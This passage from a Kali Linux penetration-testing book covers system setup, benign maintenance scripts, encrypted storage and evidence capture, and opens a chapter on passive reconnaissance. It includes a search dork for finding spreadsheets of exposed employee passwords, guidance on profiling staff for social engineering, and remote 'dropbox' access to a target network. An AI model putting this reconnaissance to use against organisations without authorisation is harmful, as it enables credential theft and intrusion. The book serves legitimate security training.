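        cksum < "$1" | cut -d' ' -f1
    fi
}

# Move the existing host keys out of /etc/ssh into $1, then let ssh-keygen -A
# create a new key of each default type. Only missing types are generated,
# which is why the old keys must be moved away first, not copied. Root only.
regen_host_keys() {
    backup=$1
    mkdir -p "$backup" || return 1
    mv /etc/ssh/ssh_host_* "$backup"/ || return 1
    ssh-keygen -A
}

# Compare every private key in $2 (new) with the file of the same name in
# $1 (old). Prints one line per key and returns 1 if any key is unchanged.
keys_replaced() {
    old=$1; new=$2; status=0
    for f in "$new"/ssh_host_*_key; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        if [ ! -f "$old/$name" ]; then
            echo "no backup of $name to compare against"
        elif [ "$(digest "$f")" = "$(digest "$old/$name")" ]; then
            echo "UNCHANGED: $name"; status=1
        else
            echo "replaced:  $name"
        fi
    done
    return $status
}

# Fingerprints of the public keys in $1, for the engagement notes; skipped
# quietly when ssh-keygen is not installed.
show_fingerprints() {
    command -v ssh-keygen >/dev/null 2>&1 || return 0
    for f in "$1"/ssh_host_*_key.pub; do
        [ -f "$f" ] && ssh-keygen -lf "$f"
    done
    return 0
}

# On a live system, as root:
#   regen_host_keys /etc/ssh/keys_default
#   keys_replaced /etc/ssh/keys_default /etc/ssh || echo "key regeneration incomplete"
#   show_fingerprints /etc/ssh
```

Record the fingerprints that show_fingerprints prints: any machine that connected to this Kali image before the keys were replaced will now warn that the host key has changed, and the recorded fingerprints are what lets you confirm the warning is your own doing rather than an interception.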



To start the SSH service using the menu, select Applications | Kali Linux | 
System Services | SSHD | SSHD Start. 

To start SSH from the command line, use the command line shown in the 
following screenshot: 

root@kali:~# /etc/init.d/ssh start
[ ok ] Starting OpenBSD Secure Shell server: sshd.
root@kali:~#



To verify that SSH is running, perform a netstat query, as shown in the
following screenshot:

root@kali:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      19783/sshd


The SSH daemon is listening on port 22 in the previous example. To stop SSH, use
the following command:

/etc/init.d/ssh stop

Current Kali releases use systemd, where the equivalents are systemctl start ssh
and systemctl stop ssh, and ss -tlnp replaces netstat. Stop the service when it is
not needed: it is one more externally-listening port on a machine that will hold
client data.

Updating Kali Linux

Kali must be patched regularly to ensure that the base operating system and 
applications are up-to-date and that security patches have been applied. 

The Debian package management system 

Debian's package management system relies on discrete bundled applications 
called packages. Packages can be installed or removed by the user to customize the 
environment, and support tasks such as penetration testing. They can also extend 
the functionality of Kali, supporting tasks, such as communications (Skype, instant 
messaging, and secure e-mails) or documentation (OpenOffice and Microsoft Office 
running under Wine). 

Packages are stored in repositories and are signed, so that the integrity of each
package can be verified when it is downloaded to the system.

Packages and repositories 

By default, Kali uses only the official Kali repositories. It is possible that an
incomplete installation process may not add the repositories to the correct
sources.list file, or that you may wish to extend the available repositories when
new applications are added.

Updating the sources.list file can be done from the command line (echo deb
http://http.kali.org/kali kali main contrib non-free >> /etc/apt/sources.list),
or by using a text editor.

The default package repositories that should be present in /etc/apt/sources.list
are listed as follows; if not present, edit the sources.list file to include them:

## Kali
deb http://http.kali.org/kali kali main contrib non-free
## Kali-dev
deb http://http.kali.org/kali kali-dev main contrib non-free
## Kali Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free

These are the suites of the Kali 1.x releases this chapter describes. Later Kali
releases are a rolling distribution with a single kali-rolling suite, so check the
sources.list shipped with your installation before editing it.

Not every Kali tool is presently maintained in the official tool repositories. If you
choose to update a tool manually, it is possible that you will overwrite existing
packaged files and break dependencies. Therefore, some tools that have not been
officially moved to Debian repositories, such as aircrack-ng, dnsrecon, sqlmap,
beef-xss, and the Social Engineering Toolkit (se-toolkit), are maintained in the
Bleeding Edge repository. This repository may also be added to sources.list using
the following line:

## Bleeding Edge repository
deb http://repo.kali.org/kali kali-bleeding-edge main
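
A safer way to add repository lines than echo ... >> sources.list, added here as an example that is not part of the book: it appends only when no equivalent uncommented line is already present, so a setup script can be re-run without stacking duplicate entries (which apt reports as warnings on every update). The file path is a parameter; try it on a copy of /etc/apt/sources.list before pointing it at the real one.

```sh
#!/bin/sh
# Added example: idempotent repository lines for sources.list.
#   ensure_repo /etc/apt/sources.list "deb http://http.kali.org/kali kali main contrib non-free"

# Strip comments and collapse whitespace, so that
#   "deb  http://http.kali.org/kali kali main"  and
#   "deb http://http.kali.org/kali kali main   # Kali"
# are recognised as the same entry, while "# deb ..." counts as absent.
normalize_line() {
    printf '%s\n' "$1" | sed -e 's/#.*$//' -e 's/[[:space:]]\{1,\}/ /g' -e 's/^ //' -e 's/ $//'
}

# Return 0 if an equivalent active line exists in file $1.
has_repo() {
    file=$1; want=$(normalize_line "$2")
    [ -n "$want" ] || return 1
    [ -f "$file" ] || return 1
    while IFS= read -r line || [ -n "$line" ]; do
        [ "$(normalize_line "$line")" = "$want" ] && return 0
    done < "$file"
    return 1
}

# Append line $2 to file $1 unless it is already there; report either way.
ensure_repo() {
    if has_repo "$1" "$2"; then
        echo "present: $2"
    else
        printf '%s\n' "$2" >> "$1" || return 1
        echo "added:   $2"
    fi
}

if [ "$#" -eq 2 ]; then
    ensure_repo "$1" "$2"
fi
```

Run apt-get update after any change; a duplicate that slipped through shows up there as a "configured multiple times" warning, and a mistyped suite name as a 404 for the Release file.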
Dpkg

Dpkg is Debian's package management system. This command-line application is
used to install, remove, and query packages. In general, dpkg performs actions on
individual packages.

dpkg is particularly useful in compiling a list of installed
applications in Kali using the command dpkg -l > list.txt.

If you want to know if a specific tool is installed, use dpkg -l |
grep <tool name>.

The following screenshot shows an excerpt of the returned data when dpkg -l is
invoked, providing a list of all applications installed on the Kali distribution; this is
particularly useful in identifying applications that may only be accessible directly
from the command line.




root@kali:~# dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name             Version          Architecture Description
+++-================-================-============-====================================
ii  acccheck         0.2.1-1kali3     amd64        Password dictionary attack tool for
ii  accountsservice  0.6.21-8         amd64        query and manipulate user account in
ii  ace-voip         1.10-1kali4      amd64        A simple VoIP corporate directory en
ii  acl              2.2.51-8         amd64        Access control list utilities
ii  adduser          3.113+nmu3       all          add and remove users and groups
ii  afflib-tools     3.7.1-0kali3     amd64        support for Advanced Forensics forma
ii  aircrack-ng      1.2~svn2256+     amd64        An 802.11 WEP and WPA-PSK key cracki



Using Advanced Packaging Tools 

Advanced Packaging Tools (APT) extend the functionality of dpkg by searching
repositories and installing or upgrading packages along with all the required
dependencies. APT can also be used to upgrade a complete distribution.

The most common apt commands are as follows: 

• apt-get update: This is used to resynchronize the local package index
files with their source as defined in /etc/apt/sources.list. The update
command should always be used first, before performing an upgrade or
dist-upgrade.

• apt-get upgrade: This is used to install the newest versions of all packages
installed on the system using /etc/apt/sources.list. Packages that are
installed on Kali with new versions available are upgraded. The upgrade
command will not change or delete packages that are not being upgraded,
and it will not install packages that are not already present.

• apt-get dist-upgrade: This upgrades all packages currently installed on
the system and their dependencies, installing new dependencies and removing
conflicting packages where the upgrade requires it. It also removes obsolete
packages from the system.

The related apt-cache command shows a full description of a package and
identifies its dependencies (apt-cache show <package name>), and apt-get
removes a package (apt-get remove <package name>).






Some applications are not upgraded by the apt-get command. For example,
the local copy of the exploit-db archive must be manually upgraded. Create a
script named update.sh and add the following commands to it, to automate the
update process:

cd /usr/share/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar -xvjf archive.tar.bz2
rm archive.tar.bz2

Configuring and customizing Kali Linux 

Kali is a framework that is used to complete a penetration test. However, the 
tester should never feel tied to the tools that have been installed by default, or 
by the look and feel of the Kali desktop. By customizing BackTrack, a tester can 
increase the security of client data that is being collected, and make it easier to 
do a penetration test. 

Common customizations made to Kali include: 

• Resetting the root password 

• Adding a non-root user 

• Speeding up Kali operations 

• Sharing folders with MS Windows 

• Creating encrypted folders 



Run the apt-get update command and the upgrade command at
start-up to ensure your session is using the most up-to-date tools. The
easiest way to do this is to create an update.sh script that includes the
following command line:

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
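
One update.sh that does both of the jobs this chapter gives that name to, added here as an example rather than taken from the book: the apt-get update, upgrade and dist-upgrade run, followed by the exploit-db archive refresh. Before anything is unpacked over /usr/share/exploitdb, the download is checked for the bzip2 magic bytes and listed with tar -t, because a proxy login page or error page returned with HTTP 200 is otherwise handed straight to tar and the failure is easy to miss in a script that runs at start-up. The archive URL and directory are the ones given in the text; both can be overridden through environment variables.

```sh
#!/bin/sh
# Added example: update.sh that refreshes packages and the local exploit-db
# archive, refusing to unpack a download that is not a bzip2 tarball.
# Run as root:  sh update.sh run

EXPLOITDB_DIR=${EXPLOITDB_DIR:-/usr/share/exploitdb}
ARCHIVE_URL=${ARCHIVE_URL:-http://www.exploit-db.com/archive.tar.bz2}   # URL as given in the text

# A bzip2 stream starts with the bytes "BZh"; an HTML portal or error page
# served with HTTP 200 does not. Cheapest way to tell the two apart.
is_bzip2() {
    [ -s "$1" ] && [ "$(dd if="$1" bs=3 count=1 2>/dev/null)" = "BZh" ]
}

update_packages() {
    apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
}

# Download to a temporary file, verify it, and only then extract it over the
# archive directory. The existing files are never touched if a check fails.
update_exploitdb() {
    tmp=$(mktemp) || return 1
    if ! wget -q -O "$tmp" "$ARCHIVE_URL"; then
        echo "exploit-db: download of $ARCHIVE_URL failed" >&2
        rm -f "$tmp"; return 1
    fi
    if ! is_bzip2 "$tmp"; then
        echo "exploit-db: downloaded file is not a bzip2 archive (proxy or portal page?)" >&2
        rm -f "$tmp"; return 1
    fi
    if ! tar -tjf "$tmp" >/dev/null 2>&1; then
        echo "exploit-db: archive does not list cleanly, not extracting" >&2
        rm -f "$tmp"; return 1
    fi
    mkdir -p "$EXPLOITDB_DIR" || { rm -f "$tmp"; return 1; }
    tar -xjf "$tmp" -C "$EXPLOITDB_DIR"
    rc=$?
    rm -f "$tmp"
    return $rc
}

if [ "${1:-}" = "run" ]; then
    update_packages && update_exploitdb
fi
```

The script exits non-zero at the first failed stage, so when it is run from a start-up hook the status is what tells you the archive was not refreshed; the messages go to stderr for the same reason.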
Resetting the root password

To change a user's password (here, root's), use the following command:

passwd root

You will then be prompted to enter a new password, as shown in the
following screenshot:

root@kali:~# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:~#

Adding a non-root user 

Many of the applications provided in Kali must run with root-level privileges 
in order to function. Root-level privileges do possess a certain amount of risk, 
for example, miskeying a command or using the wrong command can cause 
applications to fail or even damage the system being tested. In some cases, it is 
preferable to test with user-level privileges. In fact, some applications force the use 
of lower-privilege accounts. 

To create a non-root user, you can simply use the command adduser from the terminal 
and follow the instructions that appear, as shown in the following screenshot: 

root@kali:~# adduser noroot
Adding user `noroot' ...
Adding new group `noroot' (1001) ...
Adding new user `noroot' (1001) with group `noroot' ...
Creating home directory `/home/noroot' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for noroot
Enter the new value, or press ENTER for the default
        Full Name []: rwbeggs
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
root@kali:~#



Speeding up Kali operations 

Several tools can be used to optimize and speed up Kali operations: 

• When using a virtual machine, install the virtualization vendor's guest driver
package: Guest Additions (VirtualBox) or VMware Tools (VMware).

• When creating a virtual machine, select a fixed disk size instead of one that is
dynamically allocated. It is faster to add files to a fixed disk, and there is less
file fragmentation.

• The preload application (apt-get install preload) identifies a user's
most commonly used programs and preloads binaries and dependencies into
memory to provide faster access. It works automatically after the first restart
following installation.

• BleachBit (apt-get install bleachbit) frees disk space and improves
privacy by freeing the cache, deleting cookies, clearing Internet history,
shredding temporary files, deleting logs, and discarding other unnecessary
files. Advanced features include shredding files to prevent recovery and
wiping free disk space to hide traces of files that have not been fully deleted.

• By default, Kali does not show all of the services that are started at boot.
Each service started during the boot-up process slows the system start,
and may impact memory use and system performance. Install
Boot Up Manager (BUM) to disable unnecessary services and applications
that are enabled during the boot up (apt-get install bum), as shown in
the following screenshot:



Boot-Up Manager window (columns: Activate, Description, Running) listing the
boot-time services: metasploit-postgres, wicd, rsync, pulseaudio, pppd-dns,
dns-clean, framework-postgres, apache2, plymouth-log, idmapd, yppasswdd,
portmap-boot, networking, ssh, dbus, and apport, with Apply, Advanced, and
Quit buttons.
• Add gnome-do (apt-get install gnome-do) to launch applications
directly from the keyboard. To configure gnome-do, select it from the
Applications | Accessories menu. Once launched, select the Preferences
menu, activate the Quiet Launch function, and select a launch command
(for example, Ctrl + Shift). Clear any existing commands, and then enter
the command line to be executed when the launch keys are selected.

Rather than launching directly from the keyboard, it is possible to write
specific scripts that launch complex operations.

Sharing folders with Microsoft Windows 

The Kali toolset has the flexibility to share results with applications residing on 
different operating systems, especially Microsoft Windows. The most effective way 
to share data is to create a folder that is accessible from the host operating system 
as well as the Kali Linux VM guest. 

When data is placed in a shared folder from either the host or the VM, it is 
immediately available via the shared folder to all systems that access that 
shared folder. 

To create a shared folder, perform the following steps: 

1. Create a folder on the host operating system. In this example, it will be 
called Kali_Share. 

2. Right-click on the folder and select the Sharing tab. From this menu, 
select Share. 

3. Ensure that the folder is shared with Everyone, and that Permission Level for
this share is set to Read/Write. Everyone is broader than the VM needs; if the
host's file sharing is reachable from the network, restrict the share to your
own account instead.

4. If you have not already done so, install the appropriate tools onto Kali.
For example, when using VMware, install the VMware tools (refer to the Appendix,
Installing Kali Linux).

5. When the installation is complete, go to the VMware menu and select Virtual 
Machine Setting. Find the menu that enables Shared Folders and select 
Always Enabled. Create a path to the shared folder that is present on the 
host operating system, as shown in the following screenshot: 
VMware Virtual Machine Settings dialog, with Shared Folders set to Always Enabled
and the host path of Kali_Share added.




Although VirtualBox uses different menu titles, 
the process is the same. 

6. Open the file browser on the Kali desktop. The shared folder will be visible
in the /mnt folder (it might be placed in a sub-folder, hgfs).

7. Drag the folder onto the Kali desktop to create a link to the real folder. 

8. Everything placed in the folder will be accessible in the folder of the same 
name on the host operating system, and vice versa. 

The shared folder, which will contain sensitive data from a penetration test, must be 
encrypted to protect the client's network and reduce the tester's liability should the 
data ever be lost or stolen. 
Creating an encrypted folder with TrueCrypt

During a penetration test, you will have access to sensitive client information,
including exploitable vulnerabilities and copies of successfully breached data.

It is the tester's legal and moral responsibility to ensure that this information in
his care is secured at all times. The best means of meeting this responsibility is to
ensure that all client information is encrypted during storage and transmission.

TrueCrypt development ended in 2014 and the project is no longer maintained. Its
successor, VeraCrypt, can mount TrueCrypt volumes and offers the same volume
creation wizard, so the steps below apply to it as well.

To use TrueCrypt on Kali, complete the following steps:

1. In the Applications menu, select Accessories | TrueCrypt.

2. To create an encrypted folder, open the application. You will be presented
with the main menu, as shown in the following screenshot:
3. On the main menu, select the Create Volume button. This will launch the
TrueCrypt Volume Creation Wizard, as shown in the following screenshot:




4. Select Create an encrypted file container, and then click on Next. 

5. The next screen will prompt for Volume Type, select Standard TrueCrypt 
volume, and click on Next. 

6. On the Volume Location screen, select Select File. You will be asked to 
Specify a New TrueCrypt Volume by providing a Name, and indicating that 
it will save in the folder specified, as shown in the following screenshot: 
7. Choose a filename. Do not choose a filename related to the client being tested,
or one which indicates that sensitive material is present in the directory. Use a
number or code word to represent the client, and a generic title for results.
Save the file on the desktop, then click on Next.

8. The next screen will provide you with Encryption Options. Select
Encryption Algorithm from the drop-down menu. There are several
choices, but for regular purposes, AES (the default, with a 256-bit key) will suffice.
You will also select a Hash Algorithm from the drop-down menu; the default,
RIPEMD-160, is acceptable, and SHA-512 and Whirlpool, which the same menu
offers, are the more conservative choices. After your choices are complete,
click on the Next button, as shown in the following screenshot:



TrueCrypt Volume Creation Wizard, Encryption Options: Encryption Algorithm AES
("FIPS-approved cipher (Rijndael, published in 1998) that may be used by U.S.
government departments and agencies to protect classified information up to the
Top Secret level. 256-bit key, 128-bit block, 14 rounds (AES-256). Mode of
operation is XTS."), with Test and Benchmark buttons; Hash Algorithm RIPEMD-160.
9. You will now be prompted for Volume Size. You should have a minimum 
size of approximately 500 MB, but this may vary depending on the testing 
regime. Click on Next. 
10. The Volume Password should be selected according to the rules provided
for strong passwords. Select and confirm the password, then click on Next,
as shown in the following screenshot:



TrueCrypt Volume Creation Wizard, Volume Password: Password and Confirm
password fields, with the options Display password and Use keyfiles. The wizard's
advice: avoid a password that is a single dictionary word (or a combination of 2, 3,
or 4 such words), names, or dates of birth; a good password is a random combination
of upper- and lowercase letters, numbers, and special characters such as @ ^ = $ * +,
preferably more than 20 characters long (the maximum is 64 characters).

11. The next screen allows you to select Format Options. For Filesystem
Options, select FAT from the drop-down menu. FAT can be read from both Linux
and Windows hosts but limits a single file to 4 GB; if the volume will hold large
disk images and is only opened from Linux, choose one of the ext filesystems
instead. Click on Next.

12. The next screen, Volume Format, creates a random key for the encrypted
filesystem. Part of the key material is gathered from mouse movements, and you
will be prompted to move the mouse over the window for a long period to ensure
the randomness (cryptographic strength) of the encryption keys. When done,
click on Format to create the TrueCrypt volume.

13. The final volume has been created. It will appear as an icon on the desktop. 
The volume is encrypted, and it can be copied to an external storage device 
or moved to the host system and remain encrypted. 
To use the encrypted volume, you must first choose a Slot to manage the encrypted
folder in the main TrueCrypt menu. When this is done, use the Select File button
to select the name of the encrypted file. In this case, we'll use a previously made file
called pentest located on the desktop, as shown in the following screenshot:




Click on the Mount button. At this point, you will be prompted for the password, as 
shown in the following screenshot: 



Password prompt: Enter password for "/root/Desktop/pentest", with the options
Cache passwords and keyfiles in memory, Display password, and Use keyfiles,
and OK, Cancel, and Options buttons.
When the correct password is entered, you will see the Slot 1 details change to
reflect the encrypted folder's properties, and a new icon called truecrypt1 will
be displayed on the desktop.

If you double-click on the truecrypt1 icon, you will be taken to a File Browser view.

At this point, it will act as a regular directory, and you can use the folder to store 
all of the test-related information. When you work with the contents of the folder, 
and wish to ensure that all data is encrypted, select Dismount on the main menu. 
The folder will revert to an encrypted state. 

Managing third-party applications 

Although Kali comes preloaded with several hundred applications, it is 
likely that you will need to install additional applications to effectively test specific 
environments (such as industrial systems), add new cutting edge tools, or ensure 
that your favorite tools are installed. Kali makes it easy to locate, install, and 
manage these tools. 

Installing third-party applications 

There are multiple ways to install third-party applications: using the apt-get
command, cloning a Git repository, and installing the application directly from
source.

Wherever possible, tools should be installed from the Kali Linux repository using
the apt-get install command, so that the package system tracks their files and
dependencies. The install command can be executed from the command line
in a terminal window, or the user may select a graphical package management tool.
Recommended third-party applications include:

• apt-file: This is a command-line tool to search within packages of the
APT packaging system. It allows you to list the contents of a package without
installing or fetching it.

• gnome-tweak-tool: This allows users to change themes and rapidly
configure desktop options.

• istanbul: This is a desktop screen recorder that allows you to make a
movie of desktop activities.

• openoffice: This is an open source office productivity suite that assists
in documentation.

• scrub: This is a secure deletion (anti-forensic) tool that securely deletes
data to comply with stringent government standards using various
overwrite patterns.

• shutter: This is a screenshot tool that captures images of a desktop, an
open window, or a selection.

• teamviewer: This supports remote access and remote administration.
It also allows testers to place a pre-configured computer (a dropbox) on the
target network and control testing from a remote location.

• terminator: This is a replacement for the Linux terminal window that
allows horizontal scrolling (no more wrapped text!).

Tools that are not present in a Debian repository, and so cannot be installed with
apt-get install, can still be installed on Kali. However, the user must accept that
manual installs are not coordinated with repositories, and they may break
dependencies, causing applications to fail.

Some tools are published through an online Git hosting service such as GitHub
or Bitbucket. Many developers favor these open repositories due to the flexibility
of the Git revision system as well as the social-media aspects of the sites. One tool
that we will be using is recon-ng, a web reconnaissance framework.

To clone the current version of recon-ng from its repository, use the
following command lines:

cd /opt
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd /opt/recon-ng
./recon-ng.py
Finally, some applications must be manually installed. For example, to restore the
asynchronous port scanner Unicornscan to Kali, you must:

• Ensure the dependencies are present first: apt-get install flex

• Download the latest version of Unicornscan (www.unicornscan.org; the
current version is unicornscan-0.4.7-2)

• Extract the contents of the file to a new directory: tar jxf
unicornscan-0.4.7-2.tar.bz2

• Change to the directory containing Unicornscan: cd unicornscan-0.4.7/

• Compile the source code: ./configure CFLAGS=-D_GNU_SOURCE && make
&& make install

The exact dependencies and make install process will vary for each application, so 
you will need to refer to the developer's readme file to ensure correct installation and 
configuration of these applications. 

Running third-party applications with 
non-root privileges 

Kali Linux is intended to support penetration testing. Most of the tools require
root-level access, which is why access to the toolset and data is protected with
passwords and encryption.

However, some third-party tools are not meant to run with root-level privileges.
Tools such as web browsers may be compromised, and giving an attacker access to
root privileges can have a significant security impact.

If root access is not required, tools should follow the principle of least privilege and
run as non-root users.

In the Kali release described here, you log on as root, so an application that should
run as a non-root user has to be handed to a separate, unprivileged account. Kali
should therefore be configured with a non-root account; in this example, we will
use the noroot account previously created with the adduser command. (Since Kali
2020.1, the default installation logs in as an unprivileged user and tools that need
root are run through sudo, so this arrangement is now the norm rather than a
customization.)

Perform the following steps to run the web browser Iceweasel as non-root:

1. Create a non-root user account. In this example, we will use noroot.

2. We will use sux, a wrapper around su that transfers the X display credentials
of the privileged user to the target non-root user, so that a graphical application
started as that user can open windows on the root desktop. Download and install
sux using the apt-get install command.
3. Start the web browser, and then minimize it.

4. Enter the command line ps aux | grep iceweasel. As you can see,
Iceweasel is running with root privileges.

5. Close Iceweasel, and relaunch it using the command sux - noroot
iceweasel, as shown in the following screenshot:

root@test:~# ps aux | grep iceweasel
root      4604  5.1 17.8 585044 89084 ?        Sl   17:56   0:01 iceweasel
root      4687  0.0  0.1   7768   860 pts/0    S+   17:56   0:00 grep iceweasel
root@test:~# sux - noroot iceweasel



If you examine the Iceweasel title bar, shown in the following screenshot, you will 
see that it was invoked as the user noroot, an account that did not have 
administrator privileges. 



Iceweasel window titled "Kali Linux, an Offensive Security Project - Iceweasel (as
noroot)", showing file:///usr/share/kali-defaults/web/.



You can also confirm that Iceweasel is running under the noroot account by 
examining the open processes, as shown in the following screenshot: 

root@test:~# ps aux | grep iceweasel
root      4729  6.0  0.3  56084  1692 pts/0    S+   17:57   0:00 su - noroot -c eval $TERM; exec env TERM='xterm' DISPLAY=':0.0' "iceweasel";
noroot    4750  0.8 19.0 592224 94976 ?        Ssl  17:57   0:02 iceweasel
root      4847  0.0  0.1   7768   860 pts/1    S+   18:02   0:00 grep iceweasel



Effective management of penetration tests 

One of the most difficult aspects of penetration testing is remembering to test all of 
the relevant parts of the network or system target, or trying to remember if the target 
was actually tested, after the testing has been completed. 
BackTrack 5 R3 emphasized the use of management tools such as Dradis and MagicTree.
These tools facilitate group testing by providing a central repository for test data. 

In addition, they usually provide some framework so that testers know where they 
are within a testing methodology, and what tests remain to be completed. Tools of 
this nature are excellent in coordinating defined group activities during 
a vulnerability assessment or penetration test. 

These tools remain in the Applications | Kali Linux | Reporting Tools | Evidence 
Management menu. 

But what about complex penetration tests where the methodology may be more fluid 
as it adapts to the network target? 

Some testers use keyloggers or Wireshark during testing to record keystrokes and
packet traffic generated during the test. This data can be especially useful if the
testing causes a network or application outage, because replaying and analyzing
the packets sent can identify which packets, and which tool, impacted the network.

Kali Linux includes several tools that are more suited to making rapid notes and 
serving as a repository of rapidly added cut-and-paste data, including KeepNote 
and the Zim desktop wiki. 

Testers not only need to perform tests and collect data, they also need to be able 
to provide their findings to the client. This can be difficult, as some results are 
transient — a test demonstrates a finding at one point in time, and then something is 
changed on the target system, and future testing fails to demonstrate the exploitable 
vulnerability, even though it's possible for it to re-emerge. 

The other challenge with positive results is that they need to be demonstrated to a 
client in a way that's understandable. 

The golden rule is to always grab a screenshot of any positive, or potential, finding. 
Use a tool such as Shutter to capture images from the desktop. 

By default, Kali is configured with CutyCapt, which is a cross-platform command-line
utility that captures a web page and creates a variety of image types, including
PDF, PS, PNG, JPEG, TIFF, GIF, and BMP.

For example, to create an image of a specific size from the Google search page, enter
the following from a command-line prompt:

cutycapt --url=http://www.google.com --out=google.png --min-width=300
--min-height=250

On execution, an image of the size specified in the previous command is displayed, 
as shown in the following screenshot: 



root@kali2:~# cutycapt --url=http://www.google.com --out=google.png --min-width=300 --min-height=250
root@kali2:~# ls
Desktop  google.png
root@kali2:~# display google.png

(ImageMagick display window showing google.png: the Google search page.)


CutyCapt is especially useful when demonstrating the presence of web-based 
vulnerabilities such as cross-site scripting. 

Static images can be very useful; however, a video of an exploit that compromises
a target network and shows the actions of an attacker as they compromise sensitive
data is a very compelling tool. The istanbul screen recorder creates a video of an
"exploit in progress," which allows the exploit to be replayed for training purposes,
or to demonstrate the vulnerability to the client.

Summary 

In this chapter, we examined Kali, a collection of tools widely used by legitimate 
penetration testers and hackers to assess the security of data systems and networks. 
We emphasized Kali as a virtual machine, allowing both the host operating system 
and the VM guest to support testing. 

Kali is a repository of tools, and one of the challenges in using it is ensuring that the 
tools are up-to-date. We reviewed the Debian package management system, and how 
updates could be initiated from both the command line and from GUI applications. 
Most importantly, we learned how to customize Kali to increase the security of our 
tools and the data that they collect. We are working to achieve the goal of making 
tools support our process, instead of the other way around! 

In the next chapter, we will learn how to effectively use Open Source Intelligence 
(OSINT) to identify the vulnerable attack surfaces of our target and create 
customized username:password lists to facilitate social engineering attacks and 
other exploits. 
Reconnaissance is the first step of the kill chain when conducting a penetration 
test or an attack against a network or server target. An attacker will typically 
dedicate up to seventy-five percent of the overall work effort for a penetration test 
to reconnaissance, as it is this phase that allows the target to be defined, mapped, 
and explored for the vulnerabilities that will eventually lead to exploitation. 

There are two types of reconnaissance: passive reconnaissance, and 
active reconnaissance. 

Generally, passive reconnaissance is concerned with analyzing information that is 
openly available, usually from the target itself or public sources online. On accessing 
this information, the tester or attacker does not interact with the target in an unusual 
manner — requests and activities will not be logged, or will not be traced directly to 
the tester. Therefore, passive reconnaissance is conducted first to minimize the direct 
contact that may signal an impending attack or to identify the attacker. 

In this chapter, you will learn the principles and practices of passive reconnaissance, 
which include the following: 

• Basic principles of reconnaissance 

• Open-source intelligence (OSINT) 

• DNS reconnaissance and route mapping, including issues with IPv4 and IPv6 

• Obtaining user information 

• Profiling users for password lists 

Active reconnaissance, which involves direct interaction with the target, will be 
covered in Chapter 3, Active Reconnaissance and Vulnerability Scanning. 
Basic principles of reconnaissance 

Reconnaissance, or recon, is the first step of the kill chain when conducting a 
penetration test or attack against a data target. It is conducted before the 
actual test or attack of a target network. The findings will give a direction to where 
additional reconnaissance may be required, or the vulnerabilities to attack during 
the exploitation phase. 

Reconnaissance activities are segmented on a gradient of interactivity with the target 
network or device. 

[Figure: the reconnaissance gradient, running from passive reconnaissance (no direct 
interaction) through normal interaction to active reconnaissance; moving along it 
yields more information but a greater chance of detection] 

Passive reconnaissance does not involve direct interaction with the target network. 
The attacker's source IP address and activities are not logged (for example, a Google 
search for the target's e-mail addresses). It is difficult, if not impossible, for the target 
to differentiate passive reconnaissance from normal business activities. 

In general, passive reconnaissance focuses on the business and regulatory 
environment, the company, and the employees. Information of this type is available 
on the Internet or other public sources, and is sometimes referred to as open source 
intelligence, or OSINT. 

• Passive reconnaissance also involves the normal interactions that occur when 
an attacker interacts with the target in an expected manner. For example, 
an attacker will log on to the corporate website, view various pages, and 
download documents for further study. These interactions are expected user 
activities, and are rarely detected as a prelude to an attack on the target. 

• Active reconnaissance involves direct queries or other interactions (for 
example, port scanning of the target network) that can trigger system alarms 
or allow the target to capture the attacker's IP address and activities. This 
information could be used to identify and arrest an attacker, or during legal 
proceedings. Because active reconnaissance requires additional techniques 
for the tester to remain undetected, it will be covered in Chapter 3, Active 
Reconnaissance and Vulnerability Scanning. 
Penetration testers or attackers generally follow a process of structured information 
gathering, moving from a broad scope (the business and regulatory environments) to 
the very specific (user account data). 

To be effective, testers should know exactly what they are looking for and how the 
data will be used before collection starts. Using passive reconnaissance and limiting 
the amount of data collected minimizes the risks of being detected by the target. 



Open Source intelligence 

Generally, the first step in a penetration test or an attack is the collection of 
open-source intelligence, or OSINT. 

OSINT is information collected from public sources, particularly the Internet. The 
amount of available information is considerable — most intelligence and military 
organizations are actively engaged in OSINT activities to collect information about 
their targets, and to guard against data leakage about them. 

The process of OSINT collection and analysis is complex and could constitute its own 
book; therefore, we will cover only the essential highlights. 




The US Army manual ATP 2-22.9 (http://www.fas.org/irp/doddir/army/atp2-22-9.pdf) 
and the NATO OSINT manual (http://information-retrieval.info/docs/NATO-OSINT.html) 
are both available online, and provide excellent technical reviews of how to gather 
and assess OSINT. 



The information that is targeted for collection is dependent on the initial goal of 
the penetration test. For example, if testers want to access financial data, they will 
need the names and biographical information of relevant employees (CFO, accounts 
receivable and payable, and so on), their usernames, and passwords. If the route of 
an attack involves social engineering, they may supplement this information with 
details that give credibility to the requests for information. 

OSINT gathering usually starts with a review of the target's official online presence 
(website, blogs, social-media pages, and third-party data repositories such as public 
financial records). Information of interest includes the following: 

• Geographical locations of offices, especially remote or satellite offices that 
share corporate information but may lack stringent security controls. 

• An overview of the parent company and any subsidiary companies, 
especially any new companies acquired by mergers or acquisitions 
(these companies are frequently not as secure as the parent company). 
• Employee names and contact information, especially names, e-mail 
addresses, and phone numbers. 

• Clues about the corporate culture and language; this will facilitate social 
engineering attacks. 

• Business partners or vendors that may connect into the target's network. 

• Technologies in use. For example, if the target issues a press release about 
adopting new devices or software, the attacker will review the vendor's 
website for bug reports, known or suspected vulnerabilities, and details that 
could be used to facilitate various attacks. 

Other online information sources used by the attacker may include the following: 

• Search engines such as Google and Bing. Historically, these searches 
are highly manual; the attacker enters search terms that are specific for 
information of interest; for example, the search term "company name" 
+ password filetype:xls may identify an Excel spreadsheet that contains 
employee passwords. These search terms are referred to as google dorks 
